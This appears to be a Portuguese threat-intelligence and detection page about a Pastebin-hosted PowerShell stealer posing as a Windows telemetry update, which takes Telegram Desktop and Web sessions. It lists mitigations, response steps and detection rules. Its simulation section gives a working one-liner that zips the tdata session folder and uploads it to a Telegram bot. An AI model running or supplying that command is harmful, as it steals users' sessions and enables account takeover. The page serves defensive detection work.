Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Um script malicioso em PowerShell hospedado no Pastebin se apresenta como uma atualização do Windows enquanto rouba dados de sessão do Telegram Desktop de sistemas infectados. O script coleta detalhes do host, comprime o tdata diretório do Telegram e exfiltra o arquivo resultante através da API do Bot do Telegram. Os pesquisadores também identificaram um stealer baseado na web projetado para capturar chaves de autenticação do Telegram Web e encaminhá-las para um coletor HTTP local. Ambas as ferramentas dependem do mesmo bot do Telegram para notificações, embora as evidências disponíveis sugiram que permanecem em estágio de testes, em vez de uso operacional amplo.
Investigação
Os analistas recuperaram duas variantes de scripts hospedados no Pastebin, descobriram tokens de bot e IDs de chat codificados e reconstruíram o processo completo de exfiltração. Durante a execução, o script termina Telegram.exe, arquiva a tdata pasta e faz o upload do arquivo ZIP através do método API sendDocument do bot. A telemetria do bot também expôs um stealer focado na web que transmitiu chaves de autenticação MTProto para um coletor privado hospedado em 192.168.137.131:5000. Em geral, os achados apontam para testes funcionais e validação, em vez de uma campanha madura e em larga escala.
Mitigação
As organizações que não requerem o Telegram devem bloquear o tráfego de saída para api.telegram.org e infraestruturas relacionadas ao Telegram. Os defensores devem monitorar o PowerShell para uso do Invoke-RestMethod or WebClient alvejando endpoints da API do Telegram e detectar arquivos ZIP criados em diretórios temporários que contenham tdata conteúdo. Qualquer token de bot exposto deve ser revogado imediatamente e substituído para evitar uso indevido adicional.
Resposta
Se o script for descoberto, termine o processo de PowerShell associado e remova qualquer diag.zip arquivos gerados. Revogue todas as sessões ativas do Telegram vinculadas à conta afetada e ative a autenticação em duas etapas para reduzir o risco de acesso contínuo. O token do bot deve ser alterado e o chat do bot vinculado deve ser revisado para evidências de dados exfiltrados. Uma investigação forense mais ampla também deve confirmar se credenciais adicionais ou materiais de sessão foram coletados.
"graph TB %% Definições de classe classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 %% Nós de ação action_user_exec["<b>Ação</b> – <b>T1204 Execução do Usuário</b><br/>A vítima executa um script PowerShell chamado Windows Telemetry Update<br/><b>Técnica</b> T1036 Mascaramento"] class action_user_exec action action_powershell_interp["<b>Ação</b> – <b>T1059.001 PowerShell</b><br/>Script executado via interpretador PowerShell"] class action_powershell_interp action action_sysinfo["<b>Ação</b> – <b>T1082 Descoberta de Informações do Sistema</b><br/>Coleta USERNAME, COMPUTERNAME e IP público"] class action_sysinfo action action_collect_tdata["<b>Ação</b> – <b>T1005 Dados do Sistema Local</b><br/>Localiza diretórios tdata do Telegram Desktop e termina Telegram.exe"] class action_collect_tdata action action_archive["<b>Ação</b> – <b>T1560.001 Arquivo via Utilitário</b><br/>Compress-Archive cria diag.zip com arquivos coletados"] class action_archive action action_delete["<b>Ação</b> – <b>T1070.004 Exclusão de Arquivo</b><br/>Exclui diag.zip após o upload"] class action_delete action action_exfiltration["<b>Ação</b> – <b>T1020 Exfiltração Automatizada</b><br/>Usa o endpoint sendDocument do Bot do Telegram para exfiltrar o arquivo zip<br/><b>Subtécnicas</b> T1041 Exfiltração através de Canal C2, T1567 Exfiltração através de Serviço Web, T1071.001 Protocolos Web"] class action_exfiltration action action_session_hijack["<b>Ação</b> – <b>T1563 Sequestro de Sessão de Serviço Remoto</b><br/>Reproduz chaves de autorização MTProto a partir do tdata colhido"] class action_session_hijack action action_steal_cookies["<b>Ação</b> – <b>T1550.004 Usar Material de Autenticação Alternativo</b><br/>Rouba cookies de sessão do Telegram Web do armazenamento do navegador e encaminha para o coletor"] class action_steal_cookies action %% Nós de ferramenta / processo tool_powershell["<b>Ferramenta</b> – <b>Nome</b>: PowerShell<br/><b>Descrição</b>: Linha de comando do Windows e linguagem de script"] class tool_powershell tool tool_compress["<b>Ferramenta</b> – <b>Nome</b>: Compress-Archive<br/><b>Descrição</b>: Cmdlet do PowerShell para criar arquivos ZIP"] class tool_compress tool process_telegram["<b>Processo</b> – <b>Nome</b>: Telegram.exe<br/><b>Descrição</b>: Cliente de desktop para mensagens Telegram"] class process_telegram process tool_telegram_bot["<b>Ferramenta</b> – <b>Nome</b>: API do Bot do Telegram<br/><b>Descrição</b>: Endpoint sendDocument usado para exfiltração de dados"] class tool_telegram_bot tool %% Conexões mostrando o fluxo action_user_exec –>|dispara| action_powershell_interp action_powershell_interp –>|utiliza| tool_powershell action_powershell_interp –>|executa| action_sysinfo action_sysinfo –>|coleta| action_collect_tdata action_collect_tdata –>|termina| process_telegram action_collect_tdata –>|utiliza| tool_compress action_collect_tdata –>|cria| action_archive action_archive –>|utiliza| tool_compress action_archive –>|produz| action_exfiltration action_exfiltration –>|utiliza| tool_telegram_bot action_exfiltration –>|exclui| action_delete action_delete –>|limpa| action_exfiltration action_exfiltration –>|habilita| action_session_hijack action_session_hijack –>|facilita| action_steal_cookies "
Fluxo de Ataque
Detecções
Chamada de Métodos Suspiciosos .NET a partir do Powershell (via powershell)
Visualizar
Possível Abuso do Telegram como Canal de Comando e Controle (via dns_query)
Visualizar
Possível Tentativa de Comunicação de Domínio de Consulta de IP (via dns)
Visualizar
IOCs (SourceIP) para detectar: Dentro de um Ladrão de Sessão do Telegram: Como um Script PowerShell Hospedado no Pastebin Alveja Sessões de Desktop e Web
Visualizar
IOCs (DestinationIP) para detectar: Dentro de um Ladrão de Sessão do Telegram: Como um Script PowerShell Hospedado no Pastebin Alveja Sessões de Desktop e Web
Visualizar
Detecção de Ladrão de Sessão do Telegram via Script PowerShell [Conexão de Rede do Windows]
Visualizar
Atualização de Telemetria do Windows – Ladrão de Sessão do Telegram [Windows Powershell]
Visualizar
Execução da Simulação
Pré-requisito: O Check de Pré-vôo de Telemetria & Base Deve Ter Sido Aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção.
-
Narrativa de Ataque & Comandos:
- Reconhecimento: O atacante consulta
api.ipify.orgpara descobrir o IP público do host (usado mais tarde para registro). - Interrupção de Serviço: Para garantir que os arquivos não estejam bloqueados, para o processo legítimo do Telegram Desktop.
- Coleta de Dados: Copia recursivamente o
tdatadiretório do Telegram Desktop (arquivos de sessão) para um local temporário. - Arquivamento: Comprima os dados coletados em
diag.zip. - Exfiltração: Envia o arquivo para um Bot malicioso do Telegram via
Invoke‑RestMethod. - Limpeza: Exclui o arquivo temporário e, opcionalmente, reinicia o Telegram.
- Reconhecimento: O atacante consulta
-
Script de Teste de Regressão: Executa toda a cadeia de ataque em uma única linha de comando do PowerShell (compatível com a regra de detecção).
# Atualização de Telemetria do Windows – Ladrão de Sessão do Telegram $ip = (Invoke-RestMethod -Uri "http://api.ipify.org").Content; Stop-Process -Name Telegram -Force; $src = "$env:APPDATATelegram Desktoptdata"; $dst = "$env:TEMPdiag"; Copy-Item -Path $src -Destination $dst -Recurse -Force; Compress-Archive -Path $dst* -DestinationPath "$env:TEMPdiag.zip" -Force; $botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"; $chatId = "987654321"; Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendDocument?chat_id=$chatId" -Method Post -InFile "$env:TEMPdiag.zip" -ContentType "multipart/form-data"; Remove-Item -Path "$env:TEMPdiag.zip" -Force; -
Comandos de Limpeza: Restaura o ambiente ao seu estado original.
# Reinicia o Telegram (se desejado) e remove os dados copiados Start-Process -FilePath "$env:ProgramFilesTelegram DesktopTelegram.exe" -WindowStyle Hidden; Remove-Item -Path "$env:TEMPdiag" -Recurse -Force;